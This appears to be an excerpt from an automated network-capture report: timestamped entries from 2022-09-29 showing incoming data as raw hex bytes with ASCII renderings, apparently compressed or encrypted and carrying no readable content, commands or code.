                                                                                                                                                    2022-09-29 12:59:14 UTC17990INData Raw: 5c 81 79 fe d1 9f 7a e2 bd 0f e5 7a 98 b2 89 ae 70 65 ca 36 29 04 81 d1 7a be 3e 19 55 4e 40 c3 38 48 40 d3 8c 6a 8d 2c b8 91 9b 61 f5 04 62 72 b2 0f 23 43 53 e7 5e 46 3d 6d 81 c4 ef a7 16 e9 40 3a 5e 21 18 09 01 a4 ea 58 39 d5 db 7e ac f9 5a f2 16 b6 cd aa ee fb 33 5c ab 0d 17 9a 90 00 b9 f8 14 b1 2e 1d 89 ea 68 29 14 0c bb 61 ac b3 01 48 da b4 e0 15 3d a7 86 c0 a8 28 af 97 2b f2 7f 3f 69 1c a2 75 2c 56 4e 7a b8 1a f8 f8 67 4c e2 b0 94 52 14 5d dc 2f 79 05 10 17 a0 cc 9d fd 07 7c a0 3b 0c c1 3d 83 d4 6a 18 e5 b0 d1 5e ce ce a7 0e 08 55 dc 37 76 71 4e 3e 33 83 33 2e 9e 1c 18 36 13 22 18 54 e4 c8 59 69 b7 bb 1e 8c b0 38 52 74 38 da 10 94 77 f4 13 d6 a2 1f d2 5a c8 e6 dd fc 4a cf b0 17 e6 57 37 2a e3 8b 63 25 1f fe 76 d9 e3 2e 9b b4 59 84 8e 8c 0f 4a 6a 32
                                                                                                                                                    Data Ascii: \yzzpe6)z>UN@8H@j,abr#CS^F=m@:^!X9~Z3\.h)aH=(+?iu,VNzgLR]/y|;=j^U7vqN>33.6"TYi8Rt8wZJW7*c%v.YJj2
                                                                                                                                                    2022-09-29 12:59:14 UTC18006INData Raw: 9d 0b eb 32 c1 08 07 ae d6 45 88 d7 1d 1b aa 79 4b 23 e7 1c f3 4a 7b 93 56 c9 60 e1 ff e4 c9 16 b9 59 bf 98 0d 64 65 f5 a1 e8 c9 56 70 bf 95 96 bd 39 d0 01 b5 b1 6c 71 44 9f 89 89 ca 55 4c 08 20 99 90 58 c8 b3 95 5f 41 6d 75 36 1d b7 2e bb 6e 2e 48 11 57 96 6c 04 70 e3 94 74 31 20 cb 9b ae 61 45 b8 1d 85 2a 6d 80 65 9e a6 39 1b 5f e4 b9 84 5f 5d ce f1 4b a1 48 56 c3 28 73 63 e2 fb 24 b5 d9 7c 38 ac d8 68 c5 17 83 54 c1 13 78 8e 63 50 05 c2 08 2d 19 28 3c 44 9d ab 2d 19 e5 96 ed 97 b4 1e 75 0f 24 cb 28 5c 10 80 41 e9 50 60 6d 31 0c 35 6d 08 d2 83 32 8f 3b c7 71 36 43 0a 9d 82 d7 b0 8e d0 f3 27 97 b5 4a 2e 49 ff fd 54 62 b0 5f 64 e9 ec 1b 15 ab b0 00 eb 44 8d 55 7d 80 96 ec 8b f1 96 34 ae 4b ec cc 7d 89 ac b0 e1 5e 42 0b 9c 4f 93 cb d7 5f 93 75 fa ed f1 01
                                                                                                                                                    Data Ascii: 2EyK#J{V`YdeVp9lqDUL X_Amu6.n.HWlpt1 aE*me9__]KHV(sc$|8hTxcP-(<D-u$(\AP`m15m2;q6C'J.ITb_dDU}4K}^BO_u
                                                                                                                                                    2022-09-29 12:59:14 UTC18022INData Raw: 8f f1 fd 18 13 b8 3f 46 17 35 e1 1a 44 8b 37 77 28 ba c3 b0 2b 7b 18 37 2d a1 8b 34 8e d9 7f a7 d9 7c 5d 1f 1e 9f 9e cb 9b 0a f5 22 1e 7f f9 19 d9 c9 df c5 93 55 08 a1 8f fc c2 17 e2 4b ab 5e d4 bd ed b4 88 7a f0 b9 32 1e dd 1a cb b3 6a 98 ba bc b6 e0 68 15 7b 8e dd 3e b1 13 01 0f 50 d8 ea 98 f2 8c 9d b5 dd 7a df 1c 02 15 7e e8 0a 2c 7d 11 a5 64 4b 52 f4 27 78 8e 59 55 7d 87 65 52 b6 75 21 ae 79 b7 80 bf 4a d6 e7 85 6a a1 44 bc b8 05 1a 02 94 99 8d 52 61 dd 6b 45 45 7c 78 42 61 f1 1e e3 f2 a7 47 e1 2a fb 21 10 64 b9 68 96 f7 84 10 f4 1f c5 a2 98 e0 a0 e2 9b 18 8a db 7f 34 4f 9c 71 06 05 52 b0 60 9f 30 ed 0f b7 68 d1 02 56 ed 03 20 84 7a 77 6c 87 ad 5e 78 d2 39 38 32 70 2c c6 2c 4e 70 28 87 54 d6 08 a6 60 52 be 0e 3d 0a 87 4f cb 31 b7 b0 99 48 95 b4 60 59
                                                                                                                                                    Data Ascii: ?F5D7w(+{7-4|]"UK^z2jh{>Pz~,}dKR'xYU}eRu!yJjDRakEE|xBaG*!dh4OqR`0hV zwl^x982p,,Np(T`R=O1H`Y
                                                                                                                                                    2022-09-29 12:59:14 UTC18038INData Raw: a7 3a 85 63 91 a0 cc 45 6f 9b 79 ce de 90 ed a0 e0 a2 54 24 2b 24 48 76 e2 ec 4a c9 f4 d0 a7 8d e5 6b cf 53 9b c3 79 82 48 f1 3b 00 8c dd c6 ba f0 8e 22 e2 df 9e 59 ac fc 83 5e 1d 56 67 01 6e ca 35 53 8b 33 63 38 4f e1 4c b4 70 9a 2e e8 e1 75 18 86 d9 df b9 47 53 b6 10 5b 78 ff de 55 82 79 37 19 0c 4f ba 64 15 27 9c 2a c3 b4 90 6c ec bb e0 ef 2e d6 01 73 a5 71 93 c8 ab a2 8d 71 fe 3c 80 84 36 ba c4 f6 a2 77 85 85 ac 20 05 94 ce 62 2f d6 25 1b a8 d6 3a fe 5b 72 bd d0 7f c3 e3 e2 82 69 48 f3 5a f0 f9 16 50 cb 1b 70 e6 64 13 f7 89 28 b3 cb 97 34 ff 33 c6 6d 3b a4 91 92 7a 5d d5 63 ca db 15 14 1b aa f2 a1 93 ee f5 08 33 60 5b 65 a8 6e 9a 5a 62 0f 74 15 7d d3 46 87 e6 1a 36 f4 1b 35 47 0f fc 9c a9 c6 98 01 ff 31 7d 1c 70 3e ae 86 ef a2 ca 10 86 cc 59 12 71 6d
                                                                                                                                                    Data Ascii: :cEoyT$+$HvJkSyH;"Y^Vgn5S3c8OLp.uGS[xUy7Od'*l.sqq<6w b/%:[riHZPpd(43m;z]c3`[enZbt}F65G1}p>Yqm
                                                                                                                                                    2022-09-29 12:59:14 UTC18054INData Raw: 90 5c 45 64 cf 66 d1 59 ea 47 ce ff 70 d0 f3 eb 8c 9e 8a 6d fd 3d d0 ee fe a6 fa 05 13 25 15 b0 03 a0 ac 0a 6e 4a 15 db 58 8e a6 d1 61 b4 33 07 e2 2a 1c e9 20 e1 cd b6 c9 a9 37 d9 2d 37 c7 27 3e a2 4b 06 d2 b8 fd f1 64 1f d1 fc ef 74 78 26 eb 8b 97 18 aa e0 19 87 2d 79 d4 6d c8 8f 5b 6c 14 94 53 01 ca 28 6e cf 7e f1 51 ef 0c 26 86 4e 79 8b 35 22 e1 22 d4 b3 08 df 57 b0 8a cb 95 f4 eb 22 76 e4 d8 95 68 6b c9 4d d4 b6 9b bc e2 32 56 6c e7 fc 4a 6f 9a 38 ea bb aa 73 dc a3 fc 92 eb 9a 63 e9 76 2f 2b 3a e4 df ee d4 56 6d 71 94 04 56 6c 77 ec 8b 63 56 ef 77 b7 6c eb 59 d7 43 77 cf 4e 37 9a ce d1 21 42 e3 12 ba 71 2c fd f5 ad 2b c3 cd 97 44 7e 7a e1 00 bf cd 53 f6 3b 3b d1 14 93 b7 f1 b6 61 f4 0d 46 b9 c2 8f fa 33 f5 58 5e cd d5 ac 52 3b c6 d8 49 9a b4 97 6b fa
                                                                                                                                                    Data Ascii: \EdfYGpm=%nJXa3* 7-7'>Kdtx&-ym[lS(n~Q&Ny5""W"vhkM2VlJo8scv/+:VmqVlwcVwlYCwN7!Bq,+D~zS;;aF3X^R;Ik
                                                                                                                                                    2022-09-29 12:59:14 UTC18070INData Raw: 7c 23 75 1d f7 2e 21 90 82 7e 8a c0 b2 43 70 2e 07 4e 00 9f 82 27 fb 46 34 79 ee e7 ab bf f0 9f 6d 41 57 51 17 d5 7c 23 92 0a 7d 08 34 9d 06 b4 ff 64 76 ed b3 60 05 43 42 eb 5e e6 91 0e 60 65 cf 85 7e 32 fd 45 f7 fc 82 6b 7a a2 7c ce db 78 b3 88 5c 28 49 70 f5 44 29 a3 99 69 6f f4 b2 f4 8f 08 4b 3d 67 2a 72 56 d2 da d2 db 2b db 45 60 fe d5 f8 fc 62 39 26 ca 52 fb de 54 24 d7 f0 98 c8 51 26 51 f7 ef 16 40 b6 e7 7e e4 68 0b 74 ec f5 4c e5 d9 e5 a7 23 90 61 f2 16 a2 2d 49 85 c3 71 4b 4a d0 66 55 b5 3a 79 61 63 86 30 61 95 44 05 cb 6a 89 97 b0 24 ea 4a ff db b6 4c da 0d 9c a7 66 f4 39 ca 7e c9 ab 01 29 c1 5e 74 25 4f 2e 04 27 e9 a1 71 57 37 90 04 56 13 6e 1b 88 a1 30 92 9d 45 48 c7 57 35 cf 3f d7 dd 6a 68 7b 5a 9c 6f ad 78 89 a1 d1 e8 a4 46 23 e0 89 2b e4 b2
                                                                                                                                                    Data Ascii: |#u.!~Cp.N'F4ymAWQ|#}4dv`CB^`e~2Ekz|x\(IpD)ioK=g*rV+E`b9&RT$Q&Q@~htL#a-IqKJfU:yac0aDj$JLf9~)^t%O.'qW7Vn0EHW5?jh{ZoxF#+
                                                                                                                                                    2022-09-29 12:59:14 UTC18086INData Raw: f4 a6 d7 81 8e 42 9e 04 c4 20 c8 60 05 15 04 27 ef a8 50 3e 60 66 74 18 98 e3 59 0b a5 76 f3 e5 b8 97 46 57 a8 61 bb 3a 56 48 a5 5d 61 a5 55 8a 4a ac 79 7a 3c 21 52 a8 12 45 0d 30 00 67 6a 94 8a cd 63 0f c6 34 29 c9 d5 3e ce 2f 86 38 56 53 89 c7 ab 04 86 23 6c 3d 97 a3 1d be de 9b 58 f3 f0 93 e6 7a cd 77 a5 8f 1d f0 db 75 bb dc 44 9a e1 c9 37 84 35 94 ac f5 f6 26 b8 2b d6 13 1c 6c 1e 4b a9 e5 d7 ec d2 09 6c f4 0c 05 c1 a8 37 31 db b3 87 16 e1 6b 4f e8 18 59 00 63 7a 55 58 64 b6 45 ad 16 53 ae 5a 5f 35 43 50 f8 2b c2 d3 fa 82 64 ec e9 b8 e2 70 48 e7 ef d1 0b ed 7a 18 b9 be 95 b8 fc b6 f1 b6 ce 28 dd 5b 60 2b 88 59 6f c6 54 95 c0 51 7e 8f 38 5b 38 30 38 61 5b 68 76 83 c1 30 c7 69 06 51 74 5c 7e b8 f3 17 e3 5f b1 58 47 4d 0c ab 59 bb 9a 73 b4 92 ba 3d aa ea
                                                                                                                                                    Data Ascii: B `'P>`ftYvFWa:VH]aUJyz<!RE0gjc4)>/8VS#l=XzwuD75&+lKl71kOYczUXdESZ_5CP+dpHz([`+YoTQ~8[808a[hv0iQt\~_XGMYs=
                                                                                                                                                    2022-09-29 12:59:14 UTC18102INData Raw: 18 fe a5 23 9e bb 44 78 d4 54 e9 44 88 31 bc 46 ff 69 8f 9c 17 7f 99 96 db c8 99 62 99 6a 23 9f c5 91 6c 78 c4 bf 9c 61 8b fe e8 9a 7f 53 11 1b 76 95 0b 29 9b 54 a1 ea ec be 4a e7 99 ee 34 f5 88 02 23 a7 8d 11 6b 48 3d 57 bb 29 93 1d ca 56 b8 02 98 b1 1f 4d e4 dc e1 fb 26 3d fa 25 d1 dd 29 2b 04 05 03 1c e2 ad be 53 ef 7a d8 41 53 e0 44 23 fc 13 59 c9 a2 27 0c dd ef 5a 9a a4 83 85 d2 cc 4c 00 99 96 af 62 6e e6 da 45 16 a0 69 3e 13 10 33 3e 03 f8 c1 24 ce 67 59 cd 0a 0a 93 0e 81 b8 9e 6d 68 ae c3 b4 9a d4 96 15 d5 1d 0e ba 5f 1c 1e be 73 4d ef 00 0b 38 33 37 6d 1e 91 53 93 43 7f fa 03 94 d0 a9 0f 60 12 8c 3f e1 34 9f de ab f4 56 f4 61 b8 ad 57 a0 59 ff ea ed 70 2c 9f 40 e7 2a 47 db e1 76 b0 eb 46 2d 5e 13 fb 81 0c 9c 30 34 7f 02 6a 71 36 da c8 3a be 2d ba
                                                                                                                                                    Data Ascii: #DxTD1Fibj#lxaSv)TJ4#kH=W)VM&=%)+SzASD#Y'ZLbnEi>3>$gYmh_sM837mSC`?4VaWYp,@*GvF-^04jq6:-
                                                                                                                                                    2022-09-29 12:59:14 UTC18118INData Raw: cd 3a 4e 65 24 13 42 22 0d 20 db b8 e2 e7 95 2c 96 4b ec da bc af b4 15 1b c6 ed 04 e8 75 64 08 4d be ce a1 dc 07 04 40 38 de 0f ce be 88 26 de f4 0d 26 aa 13 e4 6a 28 90 fe d4 a9 ee 43 88 14 79 3f 47 c1 27 a5 4b 11 47 8c 12 b2 79 63 5a f2 0b ee 27 64 2b b6 b3 ff 51 43 6a b9 a2 1e 7f a0 07 11 d4 15 bd 86 97 06 62 31 49 06 f8 d0 fb 2a e9 1d 6d 6b f0 a2 e1 2d c4 cc 7b 7d 2e 39 db df f3 ef 20 c3 3d 98 64 52 c4 7b a8 72 6a 02 40 0d ff 75 62 8e 8d f4 29 cb 2b 50 98 8a 20 08 21 49 18 e6 b5 2d ce a8 88 3e 49 11 7c 18 0f 16 29 fa c4 b3 3d 6c f7 ae 51 17 4d 3e 1d ac 46 f1 97 f7 42 89 fb d6 7f e5 f4 81 a9 2e 0c 16 c9 24 e1 9c 86 40 2d 8f 6a c8 20 6f ae 3b ee 7a 32 f8 45 56 7d 49 ab bc 90 e7 b4 3e b2 81 6c ad 0a 9b e2 f3 9f 6b bb 4a 7f ba 68 1e ab 57 eb 3c 74 4c cf
                                                                                                                                                    Data Ascii: :Ne$B" ,KudM@8&&j(Cy?G'KGycZ'd+QCjb1I*mk-{}.9 =dR{rj@ub)+P !I->I|)=lQM>FB.$@-j o;z2EV}I>lkJhW<tL
                                                                                                                                                    2022-09-29 12:59:14 UTC18134INData Raw: 3c d4 89 57 d2 d5 f6 88 f3 33 5d b1 f3 cb 6b db f8 b8 56 f0 ed d7 b6 92 b3 7c 12 47 3f c0 c0 de 4e dc 1d bd 82 f6 ce 25 88 6b 3a 67 6e 4c d5 70 77 71 fe b0 ad 3a a4 ac 10 e8 02 3b 0b a7 f9 64 ff b2 bf fd 7d 71 3f f1 16 e7 ee a5 af 85 4f 29 32 6f 7f ec d9 e8 17 ae 6d 55 f9 7d bc 34 a1 e3 f1 3c ed fb 05 f3 59 50 0a 80 ad 9b 7d e9 3e fa 86 08 23 ea f5 4a 74 68 3a 9a 9b 24 2e 83 cb d2 9b 32 48 9e 13 43 6f cc fc 86 b7 0f a9 82 41 e1 61 4e af f6 97 b3 fa c9 9d 5b 6c 49 2e 40 b2 ce 68 de 99 b1 0e 7c 1a 13 c7 52 3d b2 62 3f 40 cf 24 6f 51 f1 13 f6 c7 a9 c8 9d e7 6b 05 66 ef 81 fb 85 e6 41 60 5f 4d 76 76 a2 d9 bb c0 d1 80 06 48 3e 99 84 c2 2f cd b8 28 68 5c 1e 02 ee d8 1b 23 a0 fb 97 9b d9 12 ed fc d3 0d 8d 3a a0 a8 48 cc 56 7b 53 91 20 d3 99 17 7e 68 9b 59 f3 e0
                                                                                                                                                    Data Ascii: <W3]kV|G?N%k:gnLpwq:;d}q?O)2omU}4<YP}>#Jth:$.2HCoAaN[lI.@h|R=b?@$oQkfA`_MvvH>/(h\#:HV{S ~hY
                                                                                                                                                    2022-09-29 12:59:14 UTC18150INData Raw: 2c f0 06 a3 67 96 7d d0 92 e1 d0 e4 77 18 31 3b 47 7b f4 b0 9c 14 f6 5b 38 00 22 ff 39 b5 84 c3 f6 a7 38 69 74 4a 24 5f 6b be 1e b4 c4 a1 64 cd 3a 35 c4 e0 96 b4 ed 2e 58 d8 c7 b9 e6 3c 53 a6 17 1a 24 29 f4 bf cc dd bf 7b 71 c6 62 e6 04 22 49 3b 8c 47 1c b3 00 76 ad a2 99 2d b2 ea fe 15 77 d2 21 e1 ee c0 80 c4 11 6a 6f f2 77 28 80 06 df 18 ec 44 cb 53 c0 0a 2f 2e a6 37 27 9c 11 9f a2 00 ce dc 86 c9 ab b4 48 e8 c5 4c 7b b5 f7 b0 51 a4 89 7c cc 3c 88 13 06 0a 3a ca 70 44 d6 ce 30 cc b8 04 89 a5 02 d6 c6 e9 99 48 7f 05 8c 0f 6a 26 0a e7 04 ca 1b db 7e 95 29 cf cb 62 48 7e 07 df 24 ea 6d 9e 22 39 68 07 42 81 a7 a9 4b 56 3f 6a ed 91 8f 71 15 18 ce 42 9a 50 f2 c9 14 66 f3 82 f6 53 99 d3 fe 3c e8 57 b9 a0 81 90 3e 45 31 31 e9 cb 6d 45 b6 75 26 90 ed d3 2b 37 12
                                                                                                                                                    Data Ascii: ,g}w1;G{[8"98itJ$_kd:5.X<S$){qb"I;Gv-w!jow(DS/.7'HL{Q|<:pD0Hj&~)bH~$m"9hBKV?jqBPfS<W>E11mEu&+7
                                                                                                                                                    2022-09-29 12:59:14 UTC18166INData Raw: 68 d7 7b a9 af 68 ae 71 40 bd 1f d2 a3 6a 6b 14 8d 84 b1 c4 11 2f bd 31 92 08 2d 45 5b 5e fa 4f 28 48 ed 64 70 ab 86 e7 cf 8a b6 3b 3c df 22 c9 37 a5 92 22 a0 a1 86 58 18 34 63 30 c2 31 a8 fb 35 54 dc a1 99 14 9d 47 7f a1 f7 6c 41 f6 d5 fd 0b 3a 4a ba cc 0d 81 53 c2 06 0d e9 2d 71 d3 aa 02 b7 38 00 d2 2f 31 8c 8c 1d a3 92 17 64 0d df 4e a7 34 5f 76 ac 2b eb 97 2c 1f 10 f2 e1 83 0f e2 81 91 36 f2 33 ea 82 1b a7 01 c2 44 50 06 1c cb 05 a0 6f 8a f3 d0 79 17 43 97 1a f3 83 61 41 b3 96 fd b1 ab 7f fd a5 0c 90 ec f5 9c 9b 52 e2 c5 3b 1d 7a 59 f4 22 8a a2 8a fa 09 d6 02 20 ba 13 a6 b6 bb 7f c5 91 e7 dc 9a 3b b6 ee f0 eb 1e 19 71 d5 0e b4 fd 2b 0f 49 83 0e 5b aa 2b 13 dc 20 fa 96 e8 5f e3 08 db 8f a2 f4 28 da fe 6f 5b 9b 83 f3 92 86 10 74 9a 94 fe 97 7f ce 5e 76
                                                                                                                                                    Data Ascii: h{hq@jk/1-E[^O(Hdp;<"7"X4c015TGlA:JS-q8/1dN4_v+,63DPoyCaAR;zY" ;q+I[+ _(o[t^v
                                                                                                                                                    2022-09-29 12:59:14 UTC18182INData Raw: 9a fe 12 32 e8 de 26 ff e8 5f b6 2f c8 73 30 54 5b 14 79 23 05 fa ac 11 c8 55 63 02 34 fe 2a 9b 42 9c 97 31 b7 3d 62 33 69 08 e3 88 31 12 69 e7 2d fb 2e 5c d7 4a 71 a5 45 90 52 b8 62 b0 6d e6 29 90 79 42 e5 1e 69 fd 14 9f db 96 c7 3f da 5a 8f 73 20 1b 20 36 2a c0 28 4a ac 85 8e f6 4a 44 02 25 a9 8f cf f4 b4 79 fd ba 9a 18 49 cc 7c df af 40 d5 0c 3f 78 88 02 8e aa 7e 41 a4 34 55 78 48 c8 be 6e 2a d4 18 ca 7c 2e 94 69 02 4a 6d eb 26 89 d9 a4 d7 7c 03 c6 1c f9 79 d7 57 3b 86 69 e1 ff 11 b7 a1 33 04 03 39 cc 14 f8 0b ec ef 2a 52 3a 98 ff 6d 36 a2 c9 64 e6 6d 89 71 bb 69 50 6b e5 d4 e4 6a 02 a7 f5 ff 2e 37 e9 18 50 14 9c 23 35 d1 d1 11 0d ee 8f c0 26 32 1f c5 b0 4d 21 88 3d c0 80 59 87 04 b3 11 98 38 94 73 39 38 35 c3 23 90 15 40 dc c4 ef 20 3f 1b 04 0b 06 86
                                                                                                                                                    Data Ascii: 2&_/s0T[y#Uc4*B1=b3i1i-.\JqERbm)yBi?Zs 6*(JJD%yI|@?x~A4UxHn*|.iJm&|yW;i39*R:m6dmqiPkj.7P#5&2M!=Y8s985#@ ?
                                                                                                                                                    2022-09-29 12:59:14 UTC18198INData Raw: 8e 7f 30 12 5e 8a c9 85 7f a8 f5 dd ac f8 9f 88 36 52 09 0d 2f af 5b c3 55 aa 03 02 b4 1a 30 35 87 15 22 64 b0 52 7f 00 64 ee bf 2b b9 e8 df 80 db 28 6b 8b d5 f5 d1 31 49 94 4a 28 b7 9a df 5b 7e 0c fc 85 84 93 f9 c3 82 23 20 30 ff 4b 18 28 5d 27 52 ba 18 b2 69 de ca 86 99 4b ed df 76 1f 47 71 5a 63 8b e4 3e 0d 4e 0c fd d6 8e 80 88 ef 28 68 ea c2 c3 a5 e0 90 81 ca f1 8c 13 5b da 55 7c 48 9b 92 cf 56 e6 c2 6c 2c bd ec 8f 19 2e 0a e9 ed 04 8e 3b aa 7c a1 5f d0 11 19 05 bf 4e 2e c2 36 4e af c2 6f 4c b3 2b ff e4 1b 02 af c1 89 e6 c1 49 97 f6 14 c8 5a 54 18 49 5a 7a 0e 62 bb d1 4d d4 02 67 51 0e 82 72 bc 9f cf 03 2b da 4e 29 c9 b1 2d 84 c7 85 b9 0c de 64 d5 54 48 fa 7e 73 ab 07 02 f4 55 fc b9 00 12 f0 6d 74 bb cb 3b c0 1e 3e d9 c6 a4 09 b3 6b a9 69 b3 6f 29 d8
                                                                                                                                                    Data Ascii: 0^6R/[U05"dRd+(k1IJ([~# 0K(]'RiKvGqZc>N(h[U|HVl,.;|_N.6NoL+IZTIZzbMgQr+N)-dTH~sUmt;>kio)
                                                                                                                                                    2022-09-29 12:59:14 UTC18214INData Raw: aa d1 72 88 0f 67 03 0e 61 3d 42 55 bb 62 b1 02 03 b5 2d 1a 17 a7 38 44 46 80 1a 2e 8c 9e c6 09 ed a1 f1 04 d0 b7 09 78 56 64 88 85 6d 49 d7 f5 c2 7d 99 84 14 ac 09 85 2d c1 b3 dd 97 4c 31 7d 71 6e 96 68 45 d6 ed 63 8f 07 43 e1 92 c9 cb c7 d9 b1 4e 6f 85 77 37 91 bd 52 bd 94 47 5f fe 6b 4c 69 09 45 5a 79 3f 3a cd 43 38 a5 c3 b4 ba 22 bb f2 e9 40 e3 a0 d9 26 9c 17 32 57 7a 8e 3f 4d d9 ff 07 e8 a8 e9 29 e5 12 dc 7c 0d d6 ec df 4f c9 c1 74 11 c3 c4 49 c7 ab 39 6a 19 ef 4d 9c e5 65 e3 4e c0 ea b6 a6 04 5b da 7d d3 ab ba 5d 3a 7b 4d 98 b0 83 3a 1c 36 f1 6f cf 10 a6 c6 4a 63 ba 07 1b 38 8c c1 b9 15 b2 69 ad 32 38 16 16 27 4d ac a1 43 39 a0 76 a8 d8 a8 e4 53 99 38 e0 09 3d 09 ec 38 86 e7 67 ff 2b b4 5a 79 35 18 22 1b 94 22 1d 50 ac 63 af 5b bc 15 91 e9 d9 4f 9d
                                                                                                                                                    Data Ascii: rga=BUb-8DF.xVdmI}-L1}qnhEcCNow7RG_kLiEZy?:C8"@&2Wz?M)|OtI9jMeN[}]:{M:6oJc8i28'MC9vS8=8g+Zy5""Pc[O
                                                                                                                                                    2022-09-29 12:59:14 UTC18230INData Raw: 1b c7 21 13 01 da 4b 40 d4 84 40 3a 38 5f 97 0c 71 e8 61 e0 28 cc 08 93 29 5f f2 8c 7e d4 10 97 7f e8 6c 94 d8 36 4e 03 04 b4 c5 74 46 e3 a7 20 f2 a1 3a df cb bd d7 d9 ed 24 3d 8d 6d 46 a1 03 1d 06 7f 77 b6 d9 bb 96 2b c0 57 f0 a1 2a e2 86 99 c8 f2 21 d2 89 bb 6e 89 eb 83 90 f5 18 c6 da 3b 56 36 27 d4 20 27 1b 69 ee 60 6b 95 d8 c2 b1 6d 9c 9d dc 07 6f ef 61 86 cf a7 68 3d 19 de 9b 61 eb c4 b2 89 a7 79 52 6b dd a8 d5 53 18 ad f3 50 bb 8f 90 d9 3c 73 6d 29 e0 03 c4 65 30 a3 43 d6 46 33 94 46 a7 75 12 fb 74 9c 12 8f bf a5 dd b4 55 7c ac d0 55 21 72 11 e5 9d e1 02 f8 98 cc a5 5a da 31 40 bc d4 4f 55 94 66 d3 8d 67 5f 4b 85 7a e1 1b 9e 59 eb 4e e0 2f 9c ea e4 24 bf d8 89 e9 a3 b5 e8 95 b5 99 3e ef 45 66 43 fb 32 8e 6d 3e e4 38 f1 9a 5e 6e d6 15 db 60 56 3d 1a
                                                                                                                                                    Data Ascii: !K@@:8_qa()_~l6NtF :$=mFw+W*!n;V6' 'i`kmoah=ayRkSP<sm)e0CF3FutU|U!rZ1@OUfg_KzYN/$>EfC2m>8^n`V=
                                                                                                                                                    2022-09-29 12:59:14 UTC18246INData Raw: 88 1c 6c 2c 02 71 71 0e 19 07 5e cf 9d 75 fc a7 b8 c0 25 ce b4 6b 14 9a 77 23 4c 48 2f 67 ac d3 d0 bb b0 ea d9 98 04 ec b8 59 97 cd b1 04 8c 99 35 e2 05 ef 9b 51 a2 d2 60 5a ec a5 23 26 69 33 77 a0 92 26 8b ea fe ae 2e 4a 83 d4 a6 3f 45 ed 73 bf ee bd 04 c3 1b a8 a4 17 06 e5 04 ad 88 4a d8 6c 3c 07 18 39 78 f2 ab 83 dd e3 37 b3 e9 5b 98 2d 1d 43 ae 42 ad b1 75 40 c0 8c 90 4d ee e6 ac 6a de af 32 b0 64 19 91 92 ab 0e bf 54 b4 23 1b 10 a5 77 a3 56 79 b2 6e 67 87 8f 9e 4a e8 65 03 d9 19 f5 71 bb 71 6b 76 d1 9b 43 bc cf 4f b4 85 71 71 ee be 4f 8c 0f c1 cc 80 a3 20 27 5d a7 9c 32 f9 b3 ad 9f fc 21 93 ff cd a8 b1 67 5d 4c bb 3d d4 17 26 11 f2 9f 92 0f 30 95 57 32 da 7b 4f f9 d6 69 60 83 8a 73 db 90 76 f6 8f 45 9b 15 93 d3 e0 36 f9 8f 2a 8a 43 4d 6c 9b 2c 16 58
                                                                                                                                                    Data Ascii: l,qq^u%kw#LH/gY5Q`Z#&i3w&.J?EsJl<9x7[-CBu@Mj2dT#wVyngJeqqkvCOqqO ']2!g]L=&0W2{Oi`svE6*CMl,X
                                                                                                                                                    2022-09-29 12:59:14 UTC18262INData Raw: 66 fc 19 81 98 ee b3 c1 c8 d8 c2 06 e2 33 97 e7 df a9 39 95 26 a3 62 ca bd 77 95 46 f8 26 79 c5 9b 3b 96 ff 7a 75 62 61 e3 26 8c 9a c2 fa c5 ac 15 95 d4 12 71 e3 99 cf d6 39 48 81 32 31 73 d1 48 bc d9 25 83 39 ec 7a aa 82 dc 01 aa 3e cc fb 37 c6 56 55 5e 07 ba ef f2 f0 fb 8d 5a f3 7e 5d 29 d2 5b 90 2f 61 0a bc fd 58 ee ef 73 a1 be 71 f5 c0 42 2d bf ef 65 ff c4 d8 2b 2d a9 4d 82 cc e1 f2 d2 7c a8 ff 83 47 d8 4f 2e 52 ff 60 9c 87 f6 07 ac 78 55 16 76 d3 f7 c4 57 7b 8e ab ac 9b 99 0e ba f6 7f 2c e8 93 e9 34 91 1b 4a fb d2 ff 18 96 a4 0e 82 3e 0a f7 6f ed c6 72 b3 40 79 9d 9b c3 08 b9 71 be 36 cd de e5 e5 4d ac b0 9d 11 29 10 fb f0 dc c0 bb f1 d7 4b 40 6a eb d5 2c 1f f2 99 a9 3c 09 73 10 80 59 23 8d a6 bd a8 ff eb 51 3f 09 1f 50 5e 41 4c 1d 79 b9 80 24 d7 c4
                                                                                                                                                    Data Ascii: f39&bwF&y;zuba&q9H21sH%9z>7VU^Z~])[/aXsqB-e+-M|GO.R`xUvW{,4J>or@yq6M)K@j,<sY#Q?P^ALy$
                                                                                                                                                    2022-09-29 12:59:14 UTC18278INData Raw: 6f bb af cc 02 73 82 32 09 ee 02 0c 93 a9 a1 ea db 53 7f 9e ae 1e ba 6e f7 48 cf 13 b2 ef ae 8d 20 c5 f5 30 0c a8 4a ef 33 12 21 e6 6d a1 eb 49 aa ce f9 31 01 4b 2d 24 01 87 a9 af 1e 4f 7d af 4b 15 72 12 5c 3e 7b dc 2f 3f c3 86 e1 43 45 25 b6 57 20 a8 5f 22 a1 18 5a 58 53 30 9d 0b 79 9f 7f a2 a0 11 3f f9 53 10 ae a0 bb f7 60 a2 9c b9 50 5d 01 85 e1 1e 2d 15 a8 46 5b e7 96 70 c7 46 5f 94 4a 01 d7 82 eb d9 d7 a4 f4 f0 38 c2 f9 01 ce 9e 84 74 94 34 4a b8 8b 60 46 0b f3 7c 36 33 20 c2 c2 47 61 8d 1d 3d b2 a7 19 ba 68 a3 2d 69 25 03 c9 4a e7 cd cf 66 35 f6 9d 04 dd 07 18 0e 00 f3 b5 d8 22 d1 55 5c f5 5b e0 02 b3 e7 4b a9 01 94 aa b6 a0 b8 60 c2 5c 6b 09 46 95 11 e2 4d 10 19 bf 7c 6e 8e d8 4d 2a 4b a5 b0 96 4c 0e 48 22 5b 6c df 4e da 7a 33 6f 37 f4 e9 8e 59 38
                                                                                                                                                    Data Ascii: os2SnH 0J3!mI1K-$O}Kr\>{/?CE%W _"ZXS0y?S`P]-F[pF_J8t4J`F|63 Ga=h-i%Jf5"U\[K`\kFM|nM*KLH"[lNz3o7Y8
